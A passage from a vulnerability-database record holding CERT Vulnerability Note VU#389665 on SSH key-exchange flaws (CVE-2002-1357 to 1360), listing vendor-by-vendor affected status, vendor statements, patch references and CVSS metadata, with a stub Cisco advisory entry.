Furthermore, the crash occurs in a forked process so the denial of service attacks are not possible.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23389665 Feedback>).\n\n### Hewlett-Packard Company __ Affected\n\nNotified: November 26, 2002 Updated: December 23, 2002 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nSOURCE: Hewlett-Packard Company\n\nHP Tru64 UNIX V5.1a or HP OpenVMS systems using SSH V2.4.1 should upgrade to SSH V3.2. \n \nHP has investigated this report and find that our implementations within HP-UX are not vulnerable.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23389665 Feedback>).\n\n### Intersoft International Inc. 
__ Affected\n\nNotified: November 09, 2002 Updated: January 07, 2003 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nSecureNetTerm 5.4.2 addresses vulnerabilities discovered by the Rapid7 test suite:\n\n<http://www.securenetterm.com/html/what_s_new.html> \n \n<http://www.securenetterm.com/html/downloads.html>\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23389665 Feedback>).\n\n### Juniper Networks __ Affected\n\nNotified: October 19, 2002 Updated: January 09, 2003 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nJuniper Networks has determined that the software on the ERX router platforms is susceptible to this vulnerability. Patches for all supported releases are now available to resolve the vulnerability. Customers should contact the Juniper Networks Technical Assistance Center to obtain the latest patch.\n\nInitial testing of the JUNOS software on Juniper's M-, T-, and J-series routers has not revealed any susceptibility to this vulnerability. Juniper will continue testing, and if any problems are found, corrective action will be taken. 
\n \nThe Juniper G-series Cable Modem Termination Systems are not susceptible to this vulnerability.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23389665 Feedback>).\n\n### Nortel Networks __ Affected\n\nNotified: November 27, 2002 Updated: January 20, 2003 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nThe following Nortel Networks products are being assessed to determine whether they are potentially affected by the vulnerabilities identified in CERT Advisory CA-2002-36: Shasta Broadband Service Node and Shasta Service Creation System.\n\nPassport 8000 Series Software is potentially affected; this issue will be addressed in the next maintenance releases \n3.3.2.0, for version 3.3, scheduled for availability January 24th, 2003. \n3.2.4, for version 3.2, scheduled for availability in Mid March 2003 (target) \nReleases before 3.2.1 are not affected. \nA product bulletin will be issued shortly. \n \nSTORM is potentially affected; a product bulletin will be issued shortly and this issue will be addressed in the next Maintenance Release scheduled for availability in March, 2003. \n \nOther Nortel Networks products implementing SSH are not affected by the vulnerabilities identified in CERT Advisory CA-2002-36. 
\n \nFor more information please contact Nortel at: \n \nNorth America: 1-8004NORTEL or 1-800-466-7835 \nEurope, Middle East and Africa: 00800 8008 9009, or +44 (0) 870 907 9009 \nContacts for other regions are available at <<http://www.nortelnetworks.com/help/contact/global/>>\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23389665 Feedback>).\n\n### Pragma Systems __ Affected\n\nNotified: November 13, 2002 Updated: December 02, 2002 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nDecember 16, 2002\n\nRapid 7 and CERT Coordination Center Vulnerability report VU#389665 \n \nPragma Systems Inc. of Austin, Texas, USA, was notified regarding a possible vulnerability with Version 2.0 of Pragma SecureShell. Pragma Systems tested Pragma SecureShell 2.0 and the upcoming new Version 3.0, and found that the attacks did cause a memory access protection fault on Microsoft platforms. \n \nAfter research, Pragma Systems corrected the problem. The correction of the problem leads us to believe that any attack would not cause a Denial of Service, or the ability of random code to run on the server. \n \nThe problem is corrected in Pragma SecureShell Version 3.0. Any customers with concerns regarding this vulnerability report should contact Pragma Systems, Inc at [support@pragmasys.com](<mailto:support@pragmasys.com>) for information on obtaining an upgrade free of charge. 
Pragma's web site is located at [www.pragmasys.com](<http://www.pragmasys.com/>) and the company can be reached at 1-512-219-7270.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23389665 Feedback>).\n\n### PuTTY __ Affected\n\nNotified: November 06, 2002 Updated: January 20, 2003 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nPuTTY versions 0.53 and earlier are vulnerable to a buffer overrun discovered by SSHredder. Version 0.53b fixes this vulnerability.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\n[PuTTY](<http://www.chiark.greenend.org.uk/~sgtatham/putty/>) acknowledged the existence of this vulnerability on 2002-11-07. See also:\n\n<http://www.chiark.greenend.org.uk/~sgtatham/putty/changes.html>\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23389665 Feedback>).\n\n### Riverstone Networks __ Affected\n\nNotified: December 23, 2002 Updated: January 02, 2003 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nRiverstone's implementation of SSH is based on OpenSSH, which is not vulnerable to any of the particular tests that are run by the SSHredder test suite. 
However, while running the test suite under certain conditions the router can experience a problem causing it to reload.\n\nFor more details, please see <http://www.riverstonenet.com/support/support_security.shtml> and the security advisory at <http://www.riverstonenet.com/support/tb0239-9.shtml>.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23389665 Feedback>).\n\n### SSH Communications Security __ Affected\n\nNotified: October 19, 2002 Updated: December 17, 2002 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nWith SSH Secure Shell the worst case effect of the vulnerability is a denial of service (DoS) for a single child-server (connection). This cannot be exploited to gain access to the host and this does not affect the parent server in any way, nor does it hinder the server's ability to receive new connections - it only affects the child server that is handling connections to the malicious client, or a client application that is connecting to a malicious server. No arbitrary code can be executed.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe SSH Communications Security implementation of the SSH transport layer protocol appears to be vulnerable to a null-pointer dereference, which can cause a client or child server process to crash. Existing connections and the ability to make new connections to the server are not affected. The client application terminates. 
The impact of this vulnerability seems to be limited to denial of service.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23389665 Feedback>).\n\n### WinSCP __ Affected\n\nNotified: December 17, 2002 Updated: January 20, 2003 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nBased on information from Rapid7 and Martin Prikryl, WinSCP 2.0 beta build 110 is vulnerable.\n\nWinSCP appears to be based on PuTTY, and WinSCP 2.1 beta build 119 addresses a vulnerability discovered with SSHredder: \n \n<http://winscp.vse.cz/eng/history.php#2.1.0.119>\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23389665 Feedback>).\n\n### AppGate Network Security AB __ Not Affected\n\nUpdated: May 05, 2003 \n\n### Status\n\nNot Affected\n\n### Vendor Statement\n\nAppGate builds on OpenSSH and is not vulnerable to this.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23389665 Feedback>).\n\n### Apple Computer Inc. 
__ Not Affected\n\nNotified: December 06, 2002 Updated: December 20, 2002 \n\n### Status\n\nNot Affected\n\n### Vendor Statement\n\nApple: Mac OS X and Mac OS X Server do not contain the vulnerabilities described in this report.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23389665 Feedback>).\n\n### Cray Inc. __ Not Affected\n\nNotified: November 27, 2002 Updated: November 27, 2002 \n\n### Status\n\nNot Affected\n\n### Vendor Statement\n\nCray Inc. supports the OpenSSH product through their Cray Open Software (COS) package. COS 3.3, available the end of December 2002, is not vulnerable. If a site is concerned, they can contact their local Cray representative to obtain an early copy of the OpenSSH contained in COS 3.3.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nAccording to information on the CrayDoc web site, Cray Open Software 3.2 includes OpenSSH 3.4p1:\n\n<http://www.cray.com/craydoc/manuals/S-2350-32/html-S-2350-32/zfixedegeqfbpi.html#Z1014921192FXB> \n \nFor information about OpenSSH please see the OpenSSH vendor record.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23389665 Feedback>).\n\n### Fujitsu __ Not Affected\n\nNotified: November 27, 2002 Updated: December 02, 2002 \n\n### Status\n\nNot Affected\n\n### Vendor Statement\n\nFujitsu's UXP/V OS is not vulnerable because it does not support SSH.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this 
time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23389665 Feedback>).\n\n### IBM __ Not Affected\n\nNotified: November 27, 2002 Updated: December 16, 2002 \n\n### Status\n\nNot Affected\n\n### Vendor Statement\n\nIBM's AIX is not vulnerable to the issues discussed in CERT Vulnerability Note VU#389665.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23389665 Feedback>).\n\n### MacSSH __ Not Affected\n\nNotified: December 09, 2002 Updated: December 17, 2002 \n\n### Status\n\nNot Affected\n\n### Vendor Statement\n\nI finally managed to find some time to run the test suite, and found no problem in MacSSH version 2.1fc3 (the last release available).\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\n[MacSSH](<http://www.macssh.com/>) is based in part on [lsh](<http://www.lysator.liu.se/~nisse/lsh/>), which is also not vulnerable.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23389665 Feedback>).\n\n### NetScreen __ Not Affected\n\nNotified: December 09, 2002 Updated: December 16, 2002 \n\n### Status\n\nNot Affected\n\n### Vendor Statement\n\nTested latest versions. 
Not Vulnerable.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23389665 Feedback>).\n\n### OpenSSH __ Not Affected\n\nNotified: October 19, 2002 Updated: December 13, 2002 \n\n### Status\n\nNot Affected\n\n### Vendor Statement\n\nFrom my testing it seems that the current version of OpenSSH (3.5) is not vulnerable to these problems, and some limited testing shows that no version of OpenSSH is vulnerable.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23389665 Feedback>).\n\n### VanDyke Software Inc. 
__ Not Affected\n\nNotified: November 27, 2002 Updated: December 18, 2002 \n\n### Status\n\nNot Affected\n\n### Vendor Statement\n\nFrom our testing it seems that the current versions of VanDyke's Secure Shell implementations are not vulnerable to these problems, and some limited testing shows that no prior VanDyke Secure Shell implementations are vulnerable.\n\nOfficial Releases Tested: \n \nServer:\n\n> VShell 2.1.1 October 15, 2002\n\nClients:\n\n> SecureCRT 4.0.2 December 3, 2002 \nSecureFX 2.1.1 November 7, 2002 \nEntunnel 1.0.1 October 15, 2002\n\nOlder Releases Tested: \n \nServers:\n\n> VShell 2.0.3 May 28, 2002 \nVShell 1.2.4 May 28, 2002\n\nClients:\n\n> SecureCRT 3.4.7 November 7, 2002\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23389665 Feedback>).\n\n### Xerox Corporation __ Not Affected\n\nUpdated: February 25, 2003 \n\n### Status\n\nNot Affected\n\n### Vendor Statement\n\nA response to this advisory is available from our web site:\n\n[http://www.xerox.com/security](<http://www.xerox.com/security/>).\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23389665 Feedback>).\n\n### cryptlib __ Not Affected\n\nUpdated: March 11, 2003 \n\n### Status\n\nNot Affected\n\n### Vendor Statement\n\nFrom testing against the SSHredder data the invalid packets are being caught and rejected by cryptlib's packet validity-checking code, making it not vulnerable to the problem.\n\n### Vendor Information 
\n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe cryptlib SSH implementation is reported to be not vulnerable:\n\n<http://www.cs.auckland.ac.nz/~pgut001/cryptlib/index.html>\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23389665 Feedback>).\n\n### lsh __ Not Affected\n\nNotified: December 09, 2002 Updated: December 13, 2002 \n\n### Status\n\nNot Affected\n\n### Vendor Statement\n\nI've now tried the testsuite with the latest stable release of lsh, lsh-1.4.2. Both the client and the server seem NOT VULNERABLE.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23389665 Feedback>).\n\n### 3Com Unknown\n\nUpdated: December 20, 2002 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23389665 Feedback>).\n\n### Avaya Unknown\n\nNotified: December 06, 2002 Updated: December 20, 2002 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this 
vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23389665 Feedback>).\n\n### Bitvise Unknown\n\nNotified: December 06, 2002 Updated: December 13, 2002 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23389665 Feedback>).\n\n### Computer Associates Unknown\n\nNotified: December 06, 2002 Updated: March 20, 2003 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23389665 Feedback>).\n\n### D-Link Systems Unknown\n\nNotified: December 06, 2002 Updated: December 20, 2002 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23389665 Feedback>).\n\n### Data General Unknown\n\nNotified: November 27, 2002 Updated: November 27, 2002 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further 
information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23389665 Feedback>).\n\n### Foundry Networks Inc. Unknown\n\nNotified: December 06, 2002 Updated: December 20, 2002 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23389665 Feedback>).\n\n### FreeBSD Unknown\n\nNotified: December 06, 2002 Updated: March 20, 2003 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23389665 Feedback>).\n\n### Intel Unknown\n\nNotified: December 06, 2002 Updated: December 20, 2002 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23389665 Feedback>).\n\n### Interpeak Unknown\n\nNotified: December 17, 2002 Updated: March 11, 2003 \n\n### 
Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23389665 Feedback>).\n\n### Lucent Technologies Unknown\n\nNotified: December 06, 2002 Updated: December 20, 2002 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23389665 Feedback>).\n\n### Massachusetts Institute of Technology (MIT) Unknown\n\nNotified: December 09, 2002 Updated: December 17, 2002 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23389665 Feedback>).\n\n### NEC Corporation Unknown\n\nNotified: November 27, 2002 Updated: November 26, 2002 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, 
or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23389665 Feedback>).\n\n### NetBSD Unknown\n\nNotified: December 06, 2002 Updated: March 20, 2003 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23389665 Feedback>).\n\n### Netcomposite Unknown\n\nNotified: November 25, 2002 Updated: March 11, 2003 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23389665 Feedback>).\n\n### Network Appliance Unknown\n\nNotified: December 06, 2002 Updated: December 20, 2002 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23389665 Feedback>).\n\n### Nokia Unknown\n\nNotified: November 11, 2002 Updated: December 03, 2002 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us 
with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23389665 Feedback>).\n\n### Red Hat Inc. Unknown\n\nNotified: December 06, 2002 Updated: December 20, 2002 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23389665 Feedback>).\n\n### Redback Networks Inc. Unknown\n\nNotified: December 06, 2002 Updated: December 20, 2002 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23389665 Feedback>).\n\n### SGI Unknown\n\nNotified: November 27, 2002 Updated: November 27, 2002 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23389665 Feedback>).\n\n### Sony Corporation Unknown\n\nNotified: November 27, 2002 
Updated: November 27, 2002 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23389665 Feedback>).\n\n### Sun Microsystems Inc. __ Unknown\n\nNotified: November 25, 2002 Updated: February 17, 2003 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nThe version of Secure Shell (SSH) shipped with Solaris 9 is not affected by the issues described in CERT VU#389665.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23389665 Feedback>).\n\n### TTSSH/TeraTerm Unknown\n\nNotified: December 09, 2002 Updated: December 17, 2002 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23389665 Feedback>).\n\n### The SCO Group Unknown\n\nNotified: December 06, 2002 Updated: December 20, 2002 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC 
has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23389665 Feedback>).\n\n### The SCO Group Unknown\n\nNotified: November 27, 2002 Updated: November 27, 2002 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23389665 Feedback>).\n\n### Unisys Unknown\n\nNotified: November 27, 2002 Updated: November 27, 2002 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23389665 Feedback>).\n\nView all 50 vendors __View less vendors __\n\n \n\n\n### CVSS Metrics\n\nGroup | Score | Vector \n---|---|--- \nBase | | \nTemporal | | \nEnvironmental | | \n \n \n\n\n### References\n\n * <http://www.rapid7.com/advisories/R7-0009.txt>\n * <http://www.rapid7.com/perl/DownloadRequest.pl?PackageChoice=666>\n * <http://www.ietf.org/internet-drafts/draft-ietf-secsh-transport-15.txt>\n * <http://www.ietf.org/internet-drafts/draft-ietf-secsh-architecture-13.txt>\n * <http://www.citi.umich.edu/u/provos/ssh/privsep.html>\n\n### Acknowledgements\n\nThe CERT/CC thanks Rapid7 for researching and reporting these vulnerabilities. \n\nThis document was written by Art Manion and Shawn V. 
Hernan.\n\n### Other Information\n\n**CVE IDs:** | [CVE-2002-1357](<http://web.nvd.nist.gov/vuln/detail/CVE-2002-1357>) \n---|--- \n**CERT Advisory:** | [CA-2002-36 ](<http://www.cert.org/advisories/CA-2002-36.html>) \n**Severity Metric:** | 11.04 \n**Date Public:** | 2002-12-16 \n**Date First Published:** | 2002-12-16 \n**Date Last Updated: ** | 2003-06-18 17:15 UTC \n**Document Revision: ** | 39 \n", "cvss3": {}, "published": "2002-12-16T00:00:00", "type": "cert", "title": "Multiple vendors' SSH transport layer protocol implementations contain vulnerabilities in key exchange and initialization", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": true, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2002-1357", "CVE-2002-1358", "CVE-2002-1359", "CVE-2002-1360"], "modified": "2003-06-18T17:15:00", "id": "VU:389665", "href": "https://www.kb.cert.org/vuls/id/389665", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "cisco": [{"lastseen": "2022-06-05T10:07:01", "description": "", "cvss3": {}, "published": "2002-12-19T23:00:00", "type": "cisco", "title": "SSH Malformed Packet Vulnerabilities", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": true, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": 
"NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2002-1357", "CVE-2002-1358", "CVE-2002-1359", "CVE-2002-1360"], "modified": "2002-12-19T23:00:00", "id": "CISCO-SA-20021219-SSH-PACKET", "href": "https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20021219-ssh-packet", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}]}